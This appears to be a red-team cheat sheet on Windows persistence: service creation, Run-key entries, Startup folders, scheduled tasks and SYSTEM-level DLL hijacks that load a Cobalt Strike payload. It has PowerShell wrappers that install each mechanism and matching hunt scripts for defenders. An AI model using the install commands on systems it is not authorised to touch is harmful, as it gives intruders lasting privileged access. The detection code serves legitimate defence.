Persistence
Service Manipulation
(Can be run against a remote host by prefixing the computer name: sc \\<HOST> create ...)
**The space after each option= token (binpath= , displayname= , start= ) is required by sc.exe's parser. The original note flags this for WIN7, but it applies to every Windows version.
sc create <servicename> binpath= "<c:\PATH>" displayname= "<NAME>" start= auto
sc description <servicename> "<DESCRIPTION>"
sc qc <servicename>
sc start <servicename>
sc stop <servicename>
sc delete <servicename>
sc qfailure <servicename> (shows the service's configured failure actions, i.e. what the SCM does when the service crashes)
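As an added example (not part of the original notes), the sc.exe sequence above wrapped in PowerShell, together with the triage query a defender would run to spot services created this way. PersistSvc, C:\Tools\payload.exe and the display name are placeholders; the remote-host handling assumes the standard `sc \\HOST` prefix.

```powershell
# Added example, not from the original notes. Placeholders: PersistSvc, C:\Tools\payload.exe.
# Inside PowerShell 'sc' is an alias for Set-Content, so sc.exe must be called by its full name.

function Install-PersistService {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$BinPath,
        [string]$DisplayName = $Name,
        [string]$Description = 'Placeholder description',
        [string]$Computer            # optional: run sc.exe against \\Computer
    )
    # sc.exe requires a space after every 'option=' token; passing the option and its value
    # as separate arguments yields exactly  binpath= "C:\..."  on the command line.
    $prefix = @(); if ($Computer) { $prefix = @("\\$Computer") }
    & sc.exe @prefix create $Name binpath= $BinPath displayname= $DisplayName start= auto
    if ($LASTEXITCODE -ne 0) { throw "sc create failed (exit $LASTEXITCODE)" }
    & sc.exe @prefix description $Name $Description
    & sc.exe @prefix qc $Name            # confirm BINARY_PATH_NAME and START_TYPE
    & sc.exe @prefix start $Name
}

function Remove-PersistService {
    param([Parameter(Mandatory)][string]$Name)
    & sc.exe stop $Name                  # fails harmlessly if the service is not running
    & sc.exe delete $Name
}

function Get-ServiceImagePath {
    # Extract the executable from Win32_Service.PathName, e.g.
    #   "C:\Program Files\x\svc.exe" -arg     or     C:\Windows\system32\svchost.exe -k netsvcs
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+)')     { return $Matches[1] }   # unquoted paths with spaces are cut here
    return $PathName
}

function Find-NonStandardAutoStartServices {
    # Hunt side: auto-start services whose binary lives outside %SystemRoot%. New-service
    # persistence almost always lands here, next to legitimate third-party software, so
    # treat the output as a triage list rather than a verdict.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName } |
        ForEach-Object {
            $exe = Get-ServiceImagePath $_.PathName
            if ($exe -notlike "$env:SystemRoot\*") {
                [pscustomobject]@{ Name = $_.Name; RunsAs = $_.StartName; Image = $exe; State = $_.State }
            }
        }
}

# Install-PersistService -Name PersistSvc -BinPath 'C:\Tools\payload.exe' -DisplayName 'Persist Service'
# Find-NonStandardAutoStartServices | Format-Table -AutoSize
# Remove-PersistService -Name PersistSvc
```

The hunt function deliberately keys on the image path rather than the service name: an attacker picks the name, but the binary still has to live somewhere, and outside %SystemRoot% is where it almost always ends up.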
Registry
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "<APP NAME>" /t REG_SZ /f /d "c:\<FILEPATH>"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "<APP NAME>" /f (/f suppresses the confirmation prompt)
wmic useraccount where (name='guy.fleegman') get name,sid (returns a user's SID, needed to address that user's hive as HKEY_USERS\<SID>\... instead of HKEY_CURRENT_USER; note that wmic is deprecated on current Windows builds)
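As an added example (not part of the original notes), the Run-key add/delete above done from PowerShell, a .NET replacement for the wmic SID lookup, and an audit that walks Run/RunOnce in HKLM and in every loaded user hive under HKEY_USERS. 'guy.fleegman', 'UpdaterApp' and C:\Tools\payload.exe are placeholders.

```powershell
# Added example, not from the original notes. Placeholders: guy.fleegman, UpdaterApp, C:\Tools\payload.exe.

function Get-UserSid {
    # .NET replacement for the deprecated  wmic useraccount where name='...' get sid
    param([Parameter(Mandatory)][string]$UserName)
    ([System.Security.Principal.NTAccount]$UserName).Translate(
        [System.Security.Principal.SecurityIdentifier]).Value
}

function Add-RunKeyEntry {
    # Equivalent of: reg add "<hive>\Software\Microsoft\Windows\CurrentVersion\Run" /v <name> /t REG_SZ /d <cmd> /f
    # $Hive may be HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE (needs an elevated shell) or HKEY_USERS\<SID>
    # for another user's hive while it is loaded.
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Command,
        [string]$Hive = 'HKEY_CURRENT_USER'
    )
    $key = "Registry::$Hive\Software\Microsoft\Windows\CurrentVersion\Run"
    Set-ItemProperty -LiteralPath $key -Name $Name -Value $Command -Type String   # overwrites silently, like /f
}

function Remove-RunKeyEntry {
    param([Parameter(Mandatory)][string]$Name, [string]$Hive = 'HKEY_CURRENT_USER')
    Remove-ItemProperty -LiteralPath "Registry::$Hive\Software\Microsoft\Windows\CurrentVersion\Run" `
        -Name $Name -ErrorAction SilentlyContinue
}

function Get-RunKeyEntries {
    # Hunt side: Run/RunOnce values from HKLM (including the WOW6432Node view) and from every
    # loaded user hive under HKEY_USERS. HKCU is just the current user's HKEY_USERS\<SID>, so it
    # is covered; hives of users who are not logged on are not loaded and will not appear.
    $subKeys = 'Software\Microsoft\Windows\CurrentVersion\Run',
               'Software\Microsoft\Windows\CurrentVersion\RunOnce',
               'Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    $roots = @('HKEY_LOCAL_MACHINE') + @(Get-ChildItem Registry::HKEY_USERS |
        Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |   # domain/local user SIDs only
        ForEach-Object { "HKEY_USERS\$($_.PSChildName)" })
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($root in $roots) {
        foreach ($subKey in $subKeys) {
            $path = "Registry::$root\$subKey"
            if (-not (Test-Path -LiteralPath $path)) { continue }
            $item = Get-ItemProperty -LiteralPath $path
            foreach ($prop in $item.PSObject.Properties) {
                if ($prop.Name -in $providerProps) { continue }     # provider metadata, not registry values
                [pscustomobject]@{ Hive = $root; Key = $subKey; Name = $prop.Name; Command = $prop.Value }
            }
        }
    }
}

# $sid = Get-UserSid 'guy.fleegman'
# Add-RunKeyEntry -Name UpdaterApp -Command 'C:\Tools\payload.exe'
# Get-RunKeyEntries | Format-Table -AutoSize
# Remove-RunKeyEntry -Name UpdaterApp
```

Querying HKEY_USERS by SID rather than HKCU is what makes the audit useful from a SYSTEM or admin context: it shows every logged-on user's Run values in one pass, which is exactly where a per-user implant placed by a low-privileged foothold would sit.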
Startup Folder
c:\users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (per-user, no privilege needed; the all-users equivalent is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp and requires admin rights to write)
SCHTASKS
(IF PRIVILEGED - the /RU SYSTEM and /SC ONLOGON options are available; they need an elevated shell. The DAILY form below works as an unprivileged user.)
schtasks.exe /Create /F /SC DAILY /ST 09:22 /TN "<TASKNAME>" /TR "<PAYLOAD_FILEPATH>"
schtasks.exe /Create /F /RU SYSTEM /SC ONLOGON /TN "<TASKNAME>" /TR "<PAYLOAD_FILEPATH>"
schtasks.exe /DELETE /F /TN "<TASKNAME>"
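As an added example (not part of the original notes), the two schtasks.exe forms above wrapped in PowerShell, plus a hunt query over the ScheduledTasks module that lists every task action pointing outside %SystemRoot%, with the principal it runs as and its trigger types. 'UpdaterTask' and C:\Tools\payload.exe are placeholders; Get-ScheduledTask exists on Windows 8 / Server 2012 and later (on Windows 7 fall back to schtasks /Query /FO CSV /V).

```powershell
# Added example, not from the original notes. Placeholders: UpdaterTask, C:\Tools\payload.exe.

function New-PersistTask {
    # -AsSystem uses /RU SYSTEM /SC ONLOGON and needs an elevated shell; without it the task
    # runs daily at 09:22 as the current user and needs no privilege.
    param(
        [Parameter(Mandatory)][string]$TaskName,
        [Parameter(Mandatory)][string]$Payload,
        [switch]$AsSystem
    )
    $schArgs = @('/Create', '/F', '/TN', $TaskName, '/TR', $Payload)
    if ($AsSystem) { $schArgs += '/RU', 'SYSTEM', '/SC', 'ONLOGON' }
    else           { $schArgs += '/SC', 'DAILY', '/ST', '09:22' }
    & schtasks.exe @schArgs
    if ($LASTEXITCODE -ne 0) { throw "schtasks /Create failed (exit $LASTEXITCODE)" }
}

function Remove-PersistTask {
    param([Parameter(Mandatory)][string]$TaskName)
    & schtasks.exe /Delete /F /TN $TaskName
}

function Find-NonStandardTasks {
    # Hunt side: every task action whose executable is outside %SystemRoot%, with who it runs as
    # and what triggers it. Tasks running as SYSTEM from a user-writable path deserve the first look.
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        # Trigger CIM classes are MSFT_TaskLogonTrigger, MSFT_TaskDailyTrigger, ...; keep the suffix.
        $triggers = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }          # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if ($exe -notlike "$env:SystemRoot\*") {
                [pscustomobject]@{
                    Task     = $task.TaskPath + $task.TaskName
                    RunsAs   = $task.Principal.UserId
                    Triggers = $triggers
                    State    = $task.State
                    Execute  = $exe
                    Args     = $action.Arguments
                }
            }
        }
    }
}

# New-PersistTask -TaskName UpdaterTask -Payload 'C:\Tools\payload.exe'
# New-PersistTask -TaskName UpdaterTask -Payload 'C:\Tools\payload.exe' -AsSystem   # elevated shell only
# Find-NonStandardTasks | Sort-Object RunsAs | Format-Table -AutoSize
# Remove-PersistTask -TaskName UpdaterTask
```

Expanding environment variables before the path comparison matters: a task whose action is written as %SystemRoot%\System32\cmd.exe must not be flagged, while one pointing at %APPDATA%\... must be.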
DLL Hijacking
- IKEEXT (the "ikeext" service, IKE and AuthIP IPsec Keying Modules) on Windows 7 tries to load wlbsctrl.dll, which does not ship with the OS; the lookup falls through to the system PATH, so a DLL of that name in a PATH directory writable by the attacker is loaded into the service (running as SYSTEM) when it starts. The approach in these notes is a small wrapper DLL named wlbsctrl.dll that takes a mutex (the usual single-instance guard, so the payload is not started twice if the DLL is loaded again) and then loads the actual Cobalt Strike payload, e.g. a CS DLL.
- WptsExtensions.dll is loaded by the Task Scheduler service ("Schedule"). The file no longer ships with Windows, so the same PATH fall-through applies and a DLL of that name in a writable PATH directory gets loaded. The Schedule service starts automatically, so the DLL is loaded as SYSTEM on every reboot.
- Both depend on the same precondition: a directory on the machine-wide PATH (the one services see, not the user's) that a low-privileged user can write to, and no existing copy of the DLL in the directories searched before PATH (the service's own directory, System32, System, Windows).
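As an added example (not part of the original notes), a PowerShell check of that precondition for the two service/DLL pairs named above. It probes each machine-PATH directory for real write access, looks for an existing copy of the DLL in the directories searched before PATH, and reports whether the service exists and how it starts. It does not build or drop a DLL; the service and DLL names are the ones from the notes, and the Hijackable flag is a precondition check, not proof that the service attempts the load on a given build.

```powershell
# Added example, not from the original notes. Checks preconditions only; it does not create or plant a DLL.

function Test-DirectoryWritable {
    # Actually create and delete a file; reading ACLs alone misses deny entries and inherited rights.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = [IO.Path]::Combine($Path, [IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        [IO.File]::Delete($probe)
        return $true
    } catch { return $false }
}

function Get-MachinePathDirs {
    # A SYSTEM service resolves DLLs against the machine PATH, not the current user's merged $env:Path.
    [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
        Where-Object { $_.Trim() } |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()) } |
        Select-Object -Unique
}

function Test-DllHijackCandidate {
    param(
        [Parameter(Mandatory)][string]$ServiceName,   # e.g. ikeext, Schedule
        [Parameter(Mandatory)][string]$DllName        # e.g. wlbsctrl.dll, WptsExtensions.dll
    )
    $svc = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue
    # Directories searched before PATH; a copy of the DLL in any of them makes the hijack moot.
    $early    = @("$env:SystemRoot\System32", "$env:SystemRoot\System", $env:SystemRoot)
    $pathDirs = @(Get-MachinePathDirs)
    $existing = @(foreach ($d in ($early + $pathDirs)) {
        $candidate = [IO.Path]::Combine($d, $DllName)
        if (Test-Path -LiteralPath $candidate) { $candidate }
    })
    $writable = @($pathDirs | Where-Object { Test-DirectoryWritable $_ })
    [pscustomobject]@{
        Service          = $ServiceName
        ServiceExists    = [bool]$svc
        StartType        = if ($svc) { $svc.StartType } else { $null }
        Dll              = $DllName
        ExistingCopies   = $existing
        WritablePathDirs = $writable
        Hijackable       = ([bool]$svc -and $existing.Count -eq 0 -and $writable.Count -gt 0)
    }
}

# Test-DllHijackCandidate -ServiceName ikeext   -DllName wlbsctrl.dll
# Test-DllHijackCandidate -ServiceName Schedule -DllName WptsExtensions.dll
```

Run from a low-privileged shell, WritablePathDirs is the list that matters: it is the attacker's view of where a planted DLL could go, and on the defensive side it is the list of PATH entries whose ACLs need fixing regardless of which service happens to look for which missing DLL.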